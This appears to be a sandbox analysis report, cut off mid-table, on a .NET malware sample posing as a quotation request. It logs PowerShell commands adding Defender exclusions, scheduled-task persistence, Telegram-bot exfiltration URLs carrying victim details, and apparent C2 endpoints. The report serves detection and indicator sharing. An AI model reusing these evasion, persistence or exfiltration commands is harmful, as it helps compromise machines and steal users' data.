Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tmp2F66.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
||
C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\jnqeRRexnD.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jnqeRRexnD.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1e5lt4vg.dcb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asb4y0ad.4e0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hs1dmcae.dz1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nscw2rby.mia.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbbdcaxc.lnv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uh5zlmxw.zdt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vdac2bg5.3eo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywn404b5.fgj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tmp42C0.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
|
"C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request
for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
|
||
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"
|
||
C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
|
"C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
|
||
C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
|
C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
|
||
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"
|
||
C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
|
"C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 3 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://www.office.com/
|
unknown
|
||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
https://api.telegram.org
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
http://checkip.dyndns.org
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
https://chrome.google.com/webstore?hl=enlBsq
|
unknown
|
||
https://api.telegram.org/bot/sendMessage?chat_id=&text=
|
unknown
|
||
https://chrome.google.com/webstore?hl=en
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://reallyfreegeoip.org/xml/8.46.123.75
|
188.114.96.3
|
||
http://varders.kozow.com:8081
|
unknown
|
||
http://aborters.duckdns.org:8081
|
unknown
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
https://www.office.com/x
|
unknown
|
||
http://checkip.dyndns.org/
|
158.101.44.242
|
||
http://anotherarmy.dns.army:8081
|
unknown
|
||
https://reallyfreegeoip.org/xml/8.46.123.75$
|
unknown
|
||
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20a
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
http://checkip.dyndns.org/q
|
unknown
|
||
https://www.office.com/lBsq
|
unknown
|
||
https://reallyfreegeoip.org
|
unknown
|
||
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
|
149.154.167.220
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
|
149.154.167.220
|
||
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
|
unknown
|
||
https://reallyfreegeoip.org/xml/
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
reallyfreegeoip.org
|
188.114.96.3
|
||
api.telegram.org
|
149.154.167.220
|
||
checkip.dyndns.com
|
158.101.44.242
|
||
checkip.dyndns.org
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
188.114.96.3
|
reallyfreegeoip.org
|
European Union
|
||
158.101.44.242
|
checkip.dyndns.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Request for Quotation MK FMHS_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jnqeRRexnD_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
435000
|
remote allocation
|
page execute and read and write
|
||
2DB1000
|
trusted library allocation
|
page read and write
|
||
3091000
|
trusted library allocation
|
page read and write
|
||
3A59000
|
trusted library allocation
|
page read and write
|
||
C20000
|
heap
|
page read and write
|
||
15F2000
|
trusted library allocation
|
page read and write
|
||
55DD000
|
trusted library allocation
|
page read and write
|
||
A03E000
|
stack
|
page read and write
|
||
BA2000
|
trusted library allocation
|
page read and write
|
||
6EE0000
|
trusted library allocation
|
page read and write
|
||
4176000
|
trusted library allocation
|
page read and write
|
||
34D0000
|
trusted library allocation
|
page read and write
|
||
1250000
|
trusted library allocation
|
page execute and read and write
|
||
1690000
|
heap
|
page read and write
|
||
B96000
|
trusted library allocation
|
page execute and read and write
|
||
5040000
|
heap
|
page read and write
|
||
2FEF000
|
unkown
|
page read and write
|
||
1316000
|
trusted library allocation
|
page execute and read and write
|
||
409F000
|
trusted library allocation
|
page read and write
|
||
42C000
|
remote allocation
|
page execute and read and write
|
||
40F6000
|
trusted library allocation
|
page read and write
|
||
502B000
|
stack
|
page read and write
|
||
426000
|
remote allocation
|
page execute and read and write
|
||
13D3000
|
heap
|
page read and write
|
||
B9A000
|
trusted library allocation
|
page execute and read and write
|
||
696F000
|
stack
|
page read and write
|
||
6E00000
|
heap
|
page read and write
|
||
3549000
|
trusted library allocation
|
page read and write
|
||
15F5000
|
trusted library allocation
|
page execute and read and write
|
||
3272000
|
trusted library allocation
|
page read and write
|
||
2E52000
|
trusted library allocation
|
page read and write
|
||
584E000
|
stack
|
page read and write
|
||
2A4F000
|
stack
|
page read and write
|
||
2E66000
|
trusted library allocation
|
page read and write
|
||
2E4E000
|
trusted library allocation
|
page read and write
|
||
110A000
|
trusted library allocation
|
page execute and read and write
|
||
3314000
|
trusted library allocation
|
page read and write
|
||
449A000
|
trusted library allocation
|
page read and write
|
||
985E000
|
stack
|
page read and write
|
||
4273000
|
trusted library allocation
|
page read and write
|
||
6FFE000
|
stack
|
page read and write
|
||
9A9D000
|
stack
|
page read and write
|
||
C61000
|
heap
|
page read and write
|
||
1280000
|
heap
|
page read and write
|
||
5070000
|
heap
|
page read and write
|
||
540E000
|
stack
|
page read and write
|
||
1318000
|
heap
|
page read and write
|
||
4113000
|
trusted library allocation
|
page read and write
|
||
69B0000
|
trusted library allocation
|
page read and write
|
||
F00000
|
heap
|
page read and write
|
||
2420000
|
heap
|
page execute and read and write
|
||
4CB0000
|
heap
|
page read and write
|
||
6574000
|
heap
|
page read and write
|
||
4B13000
|
heap
|
page read and write
|
||
6CAE000
|
stack
|
page read and write
|
||
3E34000
|
trusted library allocation
|
page read and write
|
||
2E6F000
|
trusted library allocation
|
page read and write
|
||
3349000
|
trusted library allocation
|
page read and write
|
||
240E000
|
stack
|
page read and write
|
||
B90000
|
trusted library allocation
|
page read and write
|
||
50C0000
|
trusted library allocation
|
page execute and read and write
|
||
6F7000
|
stack
|
page read and write
|
||
26A0000
|
heap
|
page read and write
|
||
6D94000
|
trusted library allocation
|
page read and write
|
||
5450000
|
heap
|
page execute and read and write
|
||
3395000
|
trusted library allocation
|
page read and write
|
||
6DAD000
|
trusted library allocation
|
page read and write
|
||
444E000
|
trusted library allocation
|
page read and write
|
||
890000
|
heap
|
page read and write
|
||
53B0000
|
heap
|
page read and write
|
||
43B000
|
remote allocation
|
page execute and read and write
|
||
2920000
|
trusted library allocation
|
page read and write
|
||
4DB8000
|
trusted library allocation
|
page read and write
|
||
4FC0000
|
heap
|
page read and write
|
||
6E19000
|
heap
|
page read and write
|
||
995D000
|
stack
|
page read and write
|
||
2F9E000
|
trusted library allocation
|
page read and write
|
||
3061000
|
trusted library allocation
|
page read and write
|
||
3F22000
|
trusted library allocation
|
page read and write
|
||
107E000
|
stack
|
page read and write
|
||
69FE000
|
stack
|
page read and write
|
||
348E000
|
stack
|
page read and write
|
||
13C1000
|
heap
|
page read and write
|
||
5D0000
|
unkown
|
page readonly
|
||
6576000
|
heap
|
page read and write
|
||
80E000
|
stack
|
page read and write
|
||
4161000
|
trusted library allocation
|
page read and write
|
||
4563000
|
trusted library allocation
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
4F00000
|
trusted library allocation
|
page execute and read and write
|
||
C96000
|
heap
|
page read and write
|
||
5610000
|
heap
|
page execute and read and write
|
||
4B70000
|
trusted library allocation
|
page read and write
|
||
6C4E000
|
stack
|
page read and write
|
||
6A2E000
|
stack
|
page read and write
|
||
873000
|
trusted library allocation
|
page read and write
|
||
9E7000
|
heap
|
page read and write
|
||
2E56000
|
trusted library allocation
|
page read and write
|
||
526E000
|
stack
|
page read and write
|
||
40A4000
|
trusted library allocation
|
page read and write
|
||
6E11000
|
heap
|
page read and write
|
||
6C60000
|
trusted library allocation
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
2C22000
|
trusted library allocation
|
page read and write
|
||
42B1000
|
trusted library allocation
|
page read and write
|
||
2E21000
|
trusted library allocation
|
page read and write
|
||
25FF000
|
stack
|
page read and write
|
||
1110000
|
trusted library allocation
|
page read and write
|
||
6F40000
|
trusted library allocation
|
page execute and read and write
|
||
2BF0000
|
trusted library allocation
|
page read and write
|
||
132E000
|
heap
|
page read and write
|
||
53E0000
|
heap
|
page read and write
|
||
4007000
|
trusted library allocation
|
page read and write
|
||
438C000
|
trusted library allocation
|
page read and write
|
||
30B2000
|
trusted library allocation
|
page read and write
|
||
302D000
|
trusted library allocation
|
page read and write
|
||
55B0000
|
trusted library allocation
|
page execute and read and write
|
||
35DB000
|
trusted library allocation
|
page read and write
|
||
3132000
|
trusted library allocation
|
page read and write
|
||
424000
|
remote allocation
|
page execute and read and write
|
||
6C37000
|
trusted library allocation
|
page read and write
|
||
1230000
|
heap
|
page read and write
|
||
18E000
|
unkown
|
page read and write
|
||
425000
|
remote allocation
|
page execute and read and write
|
||
10B0000
|
heap
|
page read and write
|
||
41BB000
|
trusted library allocation
|
page read and write
|
||
5770000
|
heap
|
page read and write
|
||
693E000
|
stack
|
page read and write
|
||
705E000
|
stack
|
page read and write
|
||
6CA0000
|
heap
|
page read and write
|
||
2E16000
|
trusted library allocation
|
page read and write
|
||
AAD1000
|
trusted library allocation
|
page read and write
|
||
40B9000
|
trusted library allocation
|
page read and write
|
||
165E000
|
stack
|
page read and write
|
||
67AF000
|
stack
|
page read and write
|
||
3281000
|
trusted library allocation
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
53B4000
|
trusted library allocation
|
page read and write
|
||
9F6C000
|
stack
|
page read and write
|
||
40B1000
|
trusted library allocation
|
page read and write
|
||
11F0000
|
heap
|
page read and write
|
||
3E43000
|
trusted library allocation
|
page read and write
|
||
6C30000
|
trusted library allocation
|
page read and write
|
||
6F7E000
|
stack
|
page read and write
|
||
55D1000
|
trusted library allocation
|
page read and write
|
||
6E00000
|
trusted library allocation
|
page execute and read and write
|
||
3343000
|
trusted library allocation
|
page read and write
|
||
9CA000
|
heap
|
page read and write
|
||
4A81000
|
trusted library allocation
|
page read and write
|
||
4A8D000
|
trusted library allocation
|
page read and write
|
||
AABE000
|
stack
|
page read and write
|
||
2541000
|
trusted library allocation
|
page read and write
|
||
30B8000
|
trusted library allocation
|
page read and write
|
||
4D00000
|
heap
|
page execute and read and write
|
||
55BE000
|
trusted library allocation
|
page read and write
|
||
2F2E000
|
trusted library allocation
|
page read and write
|
||
2F72000
|
trusted library allocation
|
page read and write
|
||
32E1000
|
trusted library allocation
|
page read and write
|
||
139E000
|
heap
|
page read and write
|
||
4440000
|
trusted library allocation
|
page read and write
|
||
3F7F000
|
trusted library allocation
|
page read and write
|
||
1080000
|
heap
|
page read and write
|
||
F60000
|
heap
|
page read and write
|
||
323B000
|
heap
|
page read and write
|
||
790000
|
heap
|
page read and write
|
||
5030000
|
trusted library section
|
page readonly
|
||
4B60000
|
trusted library allocation
|
page execute and read and write
|
||
407B000
|
trusted library allocation
|
page read and write
|
||
6C8E000
|
stack
|
page read and write
|
||
1349000
|
heap
|
page read and write
|
||
BBE000
|
stack
|
page read and write
|
||
B74000
|
trusted library allocation
|
page read and write
|
||
6950000
|
trusted library allocation
|
page read and write
|
||
2D40000
|
trusted library allocation
|
page read and write
|
||
6D96000
|
trusted library allocation
|
page read and write
|
||
388E000
|
trusted library allocation
|
page read and write
|
||
2BFB000
|
trusted library allocation
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
55CA000
|
trusted library allocation
|
page read and write
|
||
EF7000
|
stack
|
page read and write
|
||
684F000
|
heap
|
page read and write
|
||
34A000
|
stack
|
page read and write
|
||
9A7000
|
trusted library allocation
|
page execute and read and write
|
||
1610000
|
trusted library allocation
|
page read and write
|
||
4CC0000
|
trusted library allocation
|
page execute and read and write
|
||
3B0000
|
heap
|
page read and write
|
||
9E3E000
|
stack
|
page read and write
|
||
864000
|
trusted library allocation
|
page read and write
|
||
1265000
|
heap
|
page read and write
|
||
4B90000
|
trusted library allocation
|
page read and write
|
||
6D9A000
|
trusted library allocation
|
page read and write
|
||
2BFE000
|
trusted library allocation
|
page read and write
|
||
263E000
|
trusted library allocation
|
page read and write
|
||
10D3000
|
trusted library allocation
|
page execute and read and write
|
||
690E000
|
stack
|
page read and write
|
||
2EB8000
|
trusted library allocation
|
page read and write
|
||
1660000
|
trusted library allocation
|
page execute and read and write
|
||
6F3E000
|
stack
|
page read and write
|
||
6DE0000
|
trusted library allocation
|
page read and write
|
||
3FD5000
|
trusted library allocation
|
page read and write
|
||
6A0E000
|
stack
|
page read and write
|
||
54B0000
|
heap
|
page read and write
|
||
2FAE000
|
unkown
|
page read and write
|
||
5510000
|
heap
|
page read and write
|
||
28FE000
|
trusted library allocation
|
page read and write
|
||
34E0000
|
heap
|
page read and write
|
||
435A000
|
trusted library allocation
|
page read and write
|
||
54BE000
|
heap
|
page read and write
|
||
65FF000
|
heap
|
page read and write
|
||
3387000
|
trusted library allocation
|
page read and write
|
||
2925000
|
trusted library allocation
|
page read and write
|
||
4119000
|
trusted library allocation
|
page read and write
|
||
6CDE000
|
stack
|
page read and write
|
||
3066000
|
trusted library allocation
|
page read and write
|
||
30B5000
|
trusted library allocation
|
page read and write
|
||
30EB000
|
trusted library allocation
|
page read and write
|
||
3307000
|
trusted library allocation
|
page read and write
|
||
65B7000
|
heap
|
page read and write
|
||
10F0000
|
heap
|
page read and write
|
||
12F4000
|
trusted library allocation
|
page read and write
|
||
2D3F000
|
stack
|
page read and write
|
||
A02000
|
heap
|
page read and write
|
||
1274000
|
trusted library allocation
|
page read and write
|
||
1300000
|
trusted library allocation
|
page read and write
|
||
5AAF000
|
stack
|
page read and write
|
||
36F6000
|
trusted library allocation
|
page read and write
|
||
330B000
|
trusted library allocation
|
page read and write
|
||
111B000
|
trusted library allocation
|
page execute and read and write
|
||
4151000
|
trusted library allocation
|
page read and write
|
||
5D2000
|
unkown
|
page readonly
|
||
6E20000
|
trusted library allocation
|
page execute and read and write
|
||
B7D000
|
trusted library allocation
|
page execute and read and write
|
||
15F7000
|
trusted library allocation
|
page execute and read and write
|
||
40AB000
|
trusted library allocation
|
page read and write
|
||
42B4000
|
trusted library allocation
|
page read and write
|
||
53C0000
|
heap
|
page read and write
|
||
6C50000
|
trusted library allocation
|
page execute and read and write
|
||
4435000
|
trusted library allocation
|
page read and write
|
||
3100000
|
trusted library allocation
|
page read and write
|
||
5BD0000
|
trusted library allocation
|
page read and write
|
||
3309000
|
trusted library allocation
|
page read and write
|
||
3F0C000
|
trusted library allocation
|
page read and write
|
||
314E000
|
trusted library allocation
|
page read and write
|
||
686E000
|
stack
|
page read and write
|
||
2EBD000
|
stack
|
page read and write
|
||
BD0000
|
trusted library allocation
|
page execute and read and write
|
||
EEF000
|
stack
|
page read and write
|
||
2E18000
|
trusted library allocation
|
page read and write
|
||
A76000
|
heap
|
page read and write
|
||
4AE0000
|
trusted library allocation
|
page read and write
|
||
4121000
|
trusted library allocation
|
page read and write
|
||
3541000
|
trusted library allocation
|
page read and write
|
||
471B000
|
stack
|
page read and write
|
||
1240000
|
trusted library allocation
|
page read and write
|
||
3EC0000
|
trusted library allocation
|
page read and write
|
||
2FA3000
|
trusted library allocation
|
page read and write
|
||
338F000
|
trusted library allocation
|
page read and write
|
||
53A0000
|
trusted library allocation
|
page read and write
|
||
2E62000
|
trusted library allocation
|
page read and write
|
||
C56000
|
heap
|
page read and write
|
||
28DB000
|
stack
|
page read and write
|
||
28EB000
|
trusted library allocation
|
page read and write
|
||
133A000
|
heap
|
page read and write
|
||
5960000
|
trusted library allocation
|
page read and write
|
||
6A4D000
|
stack
|
page read and write
|
||
2E96000
|
trusted library allocation
|
page read and write
|
||
6F10000
|
trusted library allocation
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
305F000
|
trusted library allocation
|
page read and write
|
||
434000
|
remote allocation
|
page execute and read and write
|
||
9F3E000
|
stack
|
page read and write
|
||
421000
|
remote allocation
|
page execute and read and write
|
||
43D000
|
remote allocation
|
page execute and read and write
|
||
3E3D000
|
trusted library allocation
|
page read and write
|
||
410A000
|
trusted library allocation
|
page read and write
|
||
2C0E000
|
trusted library allocation
|
page read and write
|
||
3310000
|
trusted library allocation
|
page read and write
|
||
1187000
|
stack
|
page read and write
|
||
4EE0000
|
heap
|
page read and write
|
||
3CEA000
|
trusted library allocation
|
page read and write
|
||
9F4000
|
heap
|
page read and write
|
||
3338000
|
trusted library allocation
|
page read and write
|
||
6B50000
|
trusted library allocation
|
page execute and read and write
|
||
26AA000
|
heap
|
page read and write
|
||
55BB000
|
trusted library allocation
|
page read and write
|
||
6E10000
|
trusted library allocation
|
page execute and read and write
|
||
72E0000
|
heap
|
page read and write
|
||
A5BE000
|
stack
|
page read and write
|
||
9E6C000
|
stack
|
page read and write
|
||
53AD000
|
stack
|
page read and write
|
||
6ACE000
|
stack
|
page read and write
|
||
6EF0000
|
trusted library allocation
|
page execute and read and write
|
||
1346000
|
heap
|
page read and write
|
||
3399000
|
trusted library allocation
|
page read and write
|
||
3E97000
|
trusted library allocation
|
page read and write
|
||
6DA0000
|
trusted library allocation
|
page read and write
|
||
3EAD000
|
trusted library allocation
|
page read and write
|
||
9CE000
|
heap
|
page read and write
|
||
10C0000
|
trusted library allocation
|
page read and write
|
||
6B2E000
|
stack
|
page read and write
|
||
B92000
|
trusted library allocation
|
page read and write
|
||
425E000
|
trusted library allocation
|
page read and write
|
||
5200000
|
heap
|
page read and write
|
||
422000
|
remote allocation
|
page execute and read and write
|
||
6E87000
|
trusted library allocation
|
page read and write
|
||
3175000
|
trusted library allocation
|
page read and write
|
||
A5C000
|
heap
|
page read and write
|
||
3E25000
|
trusted library allocation
|
page read and write
|
||
4369000
|
trusted library allocation
|
page read and write
|
||
4B10000
|
heap
|
page read and write
|
||
A1EE000
|
stack
|
page read and write
|
||
9AB000
|
trusted library allocation
|
page execute and read and write
|
||
100E000
|
stack
|
page read and write
|
||
1120000
|
heap
|
page read and write
|
||
1312000
|
trusted library allocation
|
page read and write
|
||
30F6000
|
trusted library allocation
|
page read and write
|
||
53C0000
|
heap
|
page read and write
|
||
A24D000
|
heap
|
page read and write
|
||
99F000
|
stack
|
page read and write
|
||
A97C000
|
stack
|
page read and write
|
||
1115000
|
trusted library allocation
|
page execute and read and write
|
||
6E2B000
|
heap
|
page read and write
|
||
69A0000
|
trusted library allocation
|
page execute and read and write
|
||
6DA8000
|
trusted library allocation
|
page read and write
|
||
6A8E000
|
stack
|
page read and write
|
||
3EEC000
|
trusted library allocation
|
page read and write
|
||
108A000
|
stack
|
page read and write
|
||
4B30000
|
heap
|
page read and write
|
||
2E5E000
|
trusted library allocation
|
page read and write
|
||
122E000
|
stack
|
page read and write
|
||
BD0000
|
trusted library allocation
|
page read and write
|
||
6570000
|
heap
|
page read and write
|
||
1391000
|
heap
|
page read and write
|
||
414C000
|
trusted library allocation
|
page read and write
|
||
2D50000
|
trusted library allocation
|
page read and write
|
||
6BCF000
|
stack
|
page read and write
|
||
442B000
|
trusted library allocation
|
page read and write
|
||
3003000
|
trusted library allocation
|
page read and write
|
||
2F64000
|
trusted library allocation
|
page read and write
|
||
43E000
|
remote allocation
|
page execute and read and write
|
||
2DFF000
|
trusted library allocation
|
page read and write
|
||
3393000
|
trusted library allocation
|
page read and write
|
||
10D0000
|
trusted library allocation
|
page read and write
|
||
2EBA000
|
trusted library allocation
|
page read and write
|
||
C9A000
|
heap
|
page read and write
|
||
4DB0000
|
trusted library allocation
|
page read and write
|
||
37DB000
|
trusted library allocation
|
page read and write
|
||
323D000
|
trusted library allocation
|
page read and write
|
||
B80000
|
trusted library allocation
|
page read and write
|
||
10C0000
|
trusted library allocation
|
page read and write
|
||
4344000
|
trusted library allocation
|
page read and write
|
||
568E000
|
stack
|
page read and write
|
||
3274000
|
trusted library allocation
|
page read and write
|
||
306B000
|
trusted library allocation
|
page read and write
|
||
10E0000
|
trusted library allocation
|
page read and write
|
||
4A64000
|
trusted library allocation
|
page read and write
|
||
5970000
|
trusted library allocation
|
page execute and read and write
|
||
3CAE000
|
trusted library allocation
|
page read and write
|
||
408A000
|
trusted library allocation
|
page read and write
|
||
546D000
|
